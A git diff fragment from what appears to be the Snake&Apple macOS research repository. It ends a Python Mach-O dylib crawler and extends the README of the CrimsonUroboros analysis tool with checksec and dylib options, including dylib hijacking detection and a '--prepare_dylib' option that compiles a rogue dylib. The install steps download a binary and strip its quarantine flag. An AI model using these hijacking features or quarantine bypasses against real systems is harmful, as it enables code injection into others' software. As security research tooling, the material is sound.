+ for binary, dylibs in self.binary_dylibs.items(): + f.write(f"{binary}: {', '.join(dylibs)}\n") + + +macho_checker = MachODylibLoadCommandsFinder() +macho_checker.parseDirectory("/") +macho_checker.print_results() +macho_checker.save_results() \ No newline at end of file diff --git a/README.md b/README.md index 9a99237..17da578 100644 --- a/README.md +++ b/README.md @@ -23,17 +23,18 @@ Each article directory contains three subdirectories: Core program resulting from the Snake&Apple article series for binary analysis. You may find older versions of this script in each article directory in this repository. * Usage ```console -usage: CrimsonUroboros [-h] -p PATH [--file_type] [--header_flags] [--endian] - [--header] [--load_commands] [--segments] [--sections] - [--symbols] [--chained_fixups] [--exports_trie] [--uuid] - [--main] [--strings_section] [--all_strings] - [--save_strings all_strings.txt] [--info] - [--verify_signature] [--cd_info] [--cd_requirements] - [--entitlements [human|xml|var]] - [--extract_cms cms_signature.der] - [--extract_certificates certificate_name] - [--remove_sig unsigned_binary] - [--sign_binary [adhoc|identity_number]] +usage: CrimsonUroboros [-h] -p PATH [--file_type] [--header_flags] [--endian] [--header] [--load_commands] [--segments] + [--sections] [--symbols] [--chained_fixups] [--exports_trie] [--uuid] [--main] + [--encryption_info [(optional) save_path.bytes]] [--strings_section] [--all_strings] + [--save_strings all_strings.txt] [--info] [--verify_signature] [--cd_info] [--cd_requirements] + [--entitlements [human|xml|var]] [--extract_cms cms_signature.der] + [--extract_certificates certificate_name] [--remove_sig unsigned_binary] + [--sign_binary [adhoc|identity_number]] [--has_pie] [--has_arc] [--is_stripped] [--has_canary] + [--has_nx_stack] [--has_nx_heap] [--has_xn] [--is_notarized] [--is_encrypted] [--has_restrict] + [--is_hr] [--is_as] [--is_fort] [--has_rpath] [--checksec] [--dylibs] [--rpaths] [--rpaths_u] + [--dylibs_paths] [--dylibs_paths_u] [--broken_relative_paths] + [--dylibtree [cache_path,output_path,is_extracted]] [--dylib_id] [--reexport_paths] [--hijack_sec] + [--dylib_hijacking [cache_path]] [--prepare_dylib [target_dylib_path]] Mach-O files parser for binary analysis @@ -54,36 +55,77 @@ MACH-O ARGS: --exports_trie Print Export Trie information --uuid Print UUID --main Print entry point and stack size + --encryption_info [(optional) save_path.bytes] + Print encryption info if any. Optionally specify an output path to dump the encrypted data (if + cryptid=0, data will be in plain text) --strings_section Print strings from __cstring section --all_strings Print strings from all sections --save_strings all_strings.txt - Parse all sections, detect strings, and save them to a - file - --info Print header, load commands, segments, sections, - symbols, and strings + Parse all sections, detect strings, and save them to a file + --info Print header, load commands, segments, sections, symbols, and strings CODE SIGNING ARGS: - --verify_signature Code Signature verification (if the contents of the - binary have been modified) + --verify_signature Code Signature verification (if the contents of the binary have been modified) --cd_info Print Code Signature information --cd_requirements Print Code Signature Requirements --entitlements [human|xml|var] - Print Entitlements in a human-readable, XML, or DER - format (default: human) + Print Entitlements in a human-readable, XML, or DER format (default: human) --extract_cms cms_signature.der - Extract CMS Signature from the Code Signature and save - it to a given file + Extract CMS Signature from the Code Signature and save it to a given file --extract_certificates certificate_name - Extract Certificates and save them to a given file. To - each filename will be added an index at the end: _0 for - signing, _1 for intermediate, and _2 for root CA - certificate + Extract Certificates and save them to a given file. To each filename will be added an index at + the end: _0 for signing, _1 for intermediate, and _2 for root CA certificate --remove_sig unsigned_binary Save the new file on a disk with removed signature --sign_binary [adhoc|identity_number] - Sign binary using specified identity - use : 'security - find-identity -v -p codesigning' to get the identity. - (default: adhoc) + Sign binary using specified identity - use : 'security find-identity -v -p codesigning' to get + the identity (default: adhoc) + +CHECKSEC ARGS: + --has_pie Check if Position-Independent Executable (PIE) is set + --has_arc Check if Automatic Reference Counting (ARC) is in use (can be false positive) + --is_stripped Check if binary is stripped + --has_canary Check if Stack Canary is in use (can be false positive) + --has_nx_stack Check if stack is non-executable (NX stack) + --has_nx_heap Check if heap is non-executable (NX heap) + --has_xn Check if binary is protected by eXecute Never (XN) ARM protection + --is_notarized Check if the application is notarized and can pass the Gatekeeper verification + --is_encrypted Check if the application is encrypted (has LC_ENCRYPTION_INFO(_64) and cryptid set to 1) + --has_restrict Check if binary has __RESTRICT segment + --is_hr Check if the Hardened Runtime is in use + --is_as Check if the App Sandbox is in use + --is_fort Check if the binary is fortified + --has_rpath Check if the binary utilise any @rpath variables + --checksec Run all checksec module options on the binary + +DYLIBS ARGS: + --dylibs Print shared libraries used by specified binary with compatibility and the current version + (loading paths unresolved, like @rpath/example.dylib) + --rpaths Print all paths (resolved) that @rpath can be resolved to + --rpaths_u Print all paths (unresolved) that @rpath can be resolved to + --dylibs_paths Print absolute dylib loading paths (resolved @rpath|@executable_path|@loader_path) in order they + are searched for + --dylibs_paths_u Print unresolved dylib loading paths. + --broken_relative_paths + Print 'broken' relative paths from the binary (cases where the dylib source is specified for an + executable directory without @executable_path) + --dylibtree [cache_path,output_path,is_extracted] + Print the dynamic dependencies of a Mach-O binary recursively. You can specify the Dyld Shared + Cache path in the first argument, the output directory as the 2nd argument, and if you have + already extracted DSC in the 3rd argument (0 or 1). The output_path will be used as a base for + dylibtree. For example, to not extract DSC, use: --dylibs ",,1", or to extract from default to + default use just --dylibs or --dylibs ",,0" which will extract DSC to extracted_dyld_share_cache/ + in the current directory + --dylib_id Print path from LC_ID_DYLIB + --reexport_paths Print paths from LC_REEXPORT_DLIB + --hijack_sec Check if binary is protected against Dylib Hijacking + --dylib_hijacking [cache_path] + Check for possible Direct and Indirect Dylib Hijacking loading paths. (optional) Specify the path + to the Dyld Shared Cache + --prepare_dylib [target_dylib_path] + Compile rogue dylib. (optional) Specify target_dylib_path, it will search for the imported + symbols from it in the dylib specified in the --path argument and automatically add it to the + source code of the rogue lib. Example: --path lib1.dylib --prepare_dylib /path/to/lib2.dylib ``` * Example: ```bash @@ -216,17 +258,28 @@ LCFinder -l macho_paths.txt --lc SEGMENT_64 2>/dev/null LCFinder -p hello --lc lc_segment_64 2>/dev/null ``` *** +### [MachODylibLoadCommandsFinder](IV.%20Dylibs/python/MachODylibLoadCommandsFinder.py) +Designed to Recursively crawl the system and parse Mach-O files to find DYLIB related load commands. +Print the total Mach-O files analyzed and how many DYLIB-related LCs existed +* Usage: +```console +MachODylibLoadCommandsFinder 2>/dev/null +``` + ## INSTALL ``` pip -r requirements.txt -python3 -m pip install pyimg4 wget https://github.com/CRKatri/trustcache/releases/download/v2.0/trustcache_macos_arm64 -O /usr/local/bin/trustcache chmod +x /usr/local/bin/trustcache xattr -d com.apple.quarantine /usr/local/bin/trustcache +brew install keith/formulae/dyld-shared-cache-extractor ``` ## LIMITATIONS * Codesigning module(codesign wrapper) works only on macOS. +* `--dylib_hijacking` needs [ipsw](https://github.com/blacktop/ipsw) to be installed. +* `--dylibtree` needs the [dyld-shared-cache-extractor](https://github.com/keith/dyld-shared-cache-extractor) to be installed. + ## WHY UROBOROS? I will write the code for each article as a class SnakeX, where X will be the article number. To make it easier for the audience to follow. Each Snake class will be a child of the previous one and infinitely "eat itself" (inherit methods of the previous class), like Uroboros. @@ -236,9 +289,12 @@ I will write the code for each article as a class SnakeX, where X will be the ar * [XNU](https://github.com/apple-oss-distributions/xnu) * [dyld](https://github.com/apple-oss-distributions/dyld) -## TODO +## TODO - IDEAS / IMPROVES * DER Entitlements converter method - currently, only the `convert_xml_entitlements_to_dict()` method exists. I need to create a Python parser for DER-encoded entitlements. * SuperBlob parser - to find other blobs in Code Signature. * Entitlements Blob parser - to check if XML and DER blobs exist. * Every method in the Snake class that use Entitlements should parse first XML > DER (currently, only XML parser exists) -* After making a SuperBlob parser and CodeDirectory blob parser, modify hasHardenedRuntime to check Runtime flag by using bitmask, instead of string. \ No newline at end of file +* After making a SuperBlob parser and CodeDirectory blob parser, modify hasHardenedRuntime to check Runtime flag by using bitmask, instead of string. +* Build Dyld Shared Cache parser and extractor to make SnakeIV independant of dyld-shared-cache-extractor. +* Add check for `CS_RESTRICT` (`0x800`) in --`checksec` to `RESTRICTED` +* Add check for `DYLIB HIJACKING` to --`checksec` \ No newline at end of file